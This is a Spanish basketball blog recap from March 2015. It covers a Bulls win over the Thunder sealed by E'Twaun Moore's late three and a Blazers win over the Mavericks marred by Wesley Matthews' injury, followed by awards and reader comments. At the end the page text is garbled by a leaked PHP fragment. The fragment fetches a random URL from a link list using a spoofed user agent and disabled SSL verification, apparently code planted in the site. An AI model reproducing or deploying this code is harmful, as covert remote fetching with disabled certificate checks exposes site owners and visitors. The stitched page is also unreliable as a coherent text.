La Crónica: Cómo deletrar E’Twaun

06 de March de 2015 por MagicJohnson32

Parecía que iba a ser un día para enumerar récords batidos por Westbrook y finalmente es el día en que hemos aprendido a deletrear E’Twaun. La aparición contra todo pronóstico de Moore desbarató los planes del base de los Thunder, que, pese a todo, sigue a un nivel de locura. En el otro partido de la jornada hay que lamentar la lesión de Wesley Matthews, out for the season. Los Blazers encajaron el golpe y batieron a los Mavs sin problemas.

etwaun

OKC Thunder 105 – Chicago Bulls 108

La noche parecía destinada a engordar la leyenda de Russell Westbrook, gigantesco una vez más en esta racha histórica que viene protagonizando. Desde Jordan en 1989, nadie había logrado tres partidos consecutivos con al menos 40 puntos, 5 rebotes y 5 asistencias, y antes que MJ, únicamente Baylor (dos veces) y Chamberlain. Lo dicho: histórico. A 5 minutos para la conclusión del partido del United Center, Westbrook ya se había asegurado un sitio en tan selecto club y tenía a los Thunder 9 puntos por encima de los Bulls. Pero en el tramo final del partido, a Westbrook se le fundieron los plomos y enfrente surgieron las figuras de Nikola Mirotic y E’Twaun Moore, fundamentales en la remontada local. El encuentro se cerró con un parcial de 5-17 que incluyó 9 puntos de Mirotic, 6 fallos de Westbrook en el tiro y el triple ganador de Moore a 2 segundos para el final, después de un airball de Westbrook y una jugada brillantemente diseñada por Thibs que Pau Gasol ejecutó con maestría. El resultado coloca a los Bulls en segunda posición de la conferencia Este y deja a los Thunder con sólo medio partido de ventaja sobre los Pelicans por la octava plaza del Oeste. Hay que destacar también el regreso de Craig Sager, el carismático reportero de la TNT, a su posición habitual a pie de pista tras casi un año de lucha contra la leucemia. Sager fue ovacionado por el United Center en una emotiva escena.

Dallas Mavericks 75 – Portland Trail Blazers 94

A veces, una victoria no es una victoria. Pese a superar claramente a los Mavericks y prolongar a 5 su racha de triunfos, los Blazers se sentían anoche derrotados. Y tenían razones para ello, puesto que Wesley Matthews, pieza esencial en los engranajes de Stotts, acababa de lesionarse de gravedad y no volveremos a verlo en acción hasta la temporada próxima. Su lesión en el talón deja a los Blazers huérfanos de uno de los más destacados triplistas de la liga (y, hasta anoche, uno de los jugadores más resistentes), y corresponderá al recién llegado Arron Afflalo llenar el hueco que deja Matthews. Aunque tal vez, y por lo visto anoche, sea Batum el que dé un paso adelante. El francés, gris en la primera mitad de temporada, viene mostrando una mejoría que ante los Mavs fue más que evidente y supone para los Blazers un posible salto cualitativo. Con Batum al mando de las operaciones y una excelente defensa, Portland superó sin problemas a unos Mavs en los que Nowitzki dio señales de fatiga y Monta Ellis no logra salir de la mala racha en la que anda metido.

PREMIOS

MVP: El francés Nicolas Batum fue el más destacado de los Blazers en el golpe de autoridad que suposo su clara victoria sobre los Mavs. Acabó el partido con 15 puntos, 12 rebotes, 6 asistencias y 1 tapón.

Rookie: Nikola Mirotic ha reaparecido justo cuando lo más lo necesitan los Bulls. Ayer fue de los más destacados de los suyos con 26 puntos, 8 rebotes y 2 tapones.

Sorpresa: E’Twaun Moore no solo anotó la canasta ganadora del partido sino que acabó con 19 puntos y un más que extraordinario 9 de 10 en TC.

Decepción: Monta Ellis y Dirk Nowitzki no pudieron superar prácticamente en ningún momento la defensa de los Blazers. El primero acabó con 12 puntos y un 5 de 20 en TC y el segundo con solo 10 puntos y 4 rebotes.

Esfuerzo en vano: Individualmente hablando Russell Westbrook y Serge Ibaka fueron los mejores del día pero se quedaron a las puertas de asaltar el United Center de Chicago. El base anotó 43 puntos, cogió 8 rebotes y repartió 7 asistencias mientras que el ala-pívot anotó 25 puntos, cogió 9 rebotes y puso 3 tapones.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. Nacho dice:
    #1

    Pues viendo el Pelicans Grizzlies. Los de Memphis muy superiores, se van doce al descanso con una tímida reacción de los de casa. La defensa de los osos es de las que dan títulos. Muy, pero que muy serios los veo. Me da que en el Oeste va a ser más seria la primera ronda que las semis de conferencia. Mucho tiene que cambiar la cosa, o muy bien tienen que estar Spurs y OKC en PO para evitar una final GSW-Grizzlies. Y esa es una serie que puede molar mucho.

      Citar

  2. Nacho dice:
    #2

    Pues a comerme mis palabras sobre el partido. Han salido los Grizzlies dormidos del descanso y los pelicans le han dado la vuelta a esto y ahora andan 5 arriba. Al final hay partido

      Citar

  3. Nacho dice:
    #3

    Vaya segunda parte de Memphis!!! Ganaron finalmente los Pelicans

      Citar

  4. Azabel dice:
    #4

    loa Pacers escalan hasta la septima posicion, y tienen el proximo juego cotra orlando para afianzarse alli, y luego los Bucks que no son los mismos desde la ida de Knight

    ojo que de seguir asi y si finalmente vuelta George puede haber primera ronda muy interesate en el este aunque no se lo crea

    Los Bucks que son sexto es un equipo serio y no le sera facil ni a cavs ni a bulls

    y las ultimas dos plazas supuestamente muy malas, terminarian en manos de Pacers y Heat, ambos equipos que tienen un record engañoso dado que han tenido multiples lesionados durante todo el curso, si los dos equipos llegan bien con sus jugadors, habra batalla y de la buena, frente a Hawks, cavs y/o bulls

    por ultimo se viene un choque sin favoritos entre los wizards y los raptors

    quien dijo que el este era tan malo?

      Citar

  5. Azabel dice:
    #5

    LOs 76ers se llevan de la lista de libres a Glenn Robinson, yo sigo creyendo que este chaval es muy muy bueno y puede ser una verdadera amenaza ofensiva, puede encontrar su lugar y sus tiros en los 76ers, ojo que puede ser una verdadera ganga

    por ultimo, nuevamente Beasley responde a los grande, ha retornado de manera muy buena a la liga, y entre el y dragic mejoran al heat completamente, si solo estuviera Bosh, no se donde podria terminar ese equipo

      Citar

  6. Nacho dice:
    #6

    Noah es el mejor base que tiene ahora Chicago!!!
    Parece que los Spurs se llevan el partido (mucho que ver con la renqueante temporada de los campeones tiene que ver el estado de forma de Parker. Ahora que fluye más su juego el equipo es más sólido)
    Las bajas de los Bulls son sensibles. Creo que deberían buscar un base, porque Hinrich está horrible (y sobre todo lento) y Brooks no puede ser base titular, desespera a todos sus compañeros. Para reventar un partido y salir del banco, ok, pero titular…

      Citar

  7. Nacho dice:
    #7

    La verdad es que es una gozada ver a estos Spurs. Mal partido del jugador eterno (por el tiro), pero cuando despliegan ese juego coral es puro espectáculo. Mills ha vuelto en forma (también se ha notado su baja y eso que Joseph no ha estado mal en la temporada) Leonard está como el año pasado, Y Belinelli empieza a ser un Manu 2.0.
    Cómo estos engrasen para PO van a ser unas primeras rondas de escándalo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>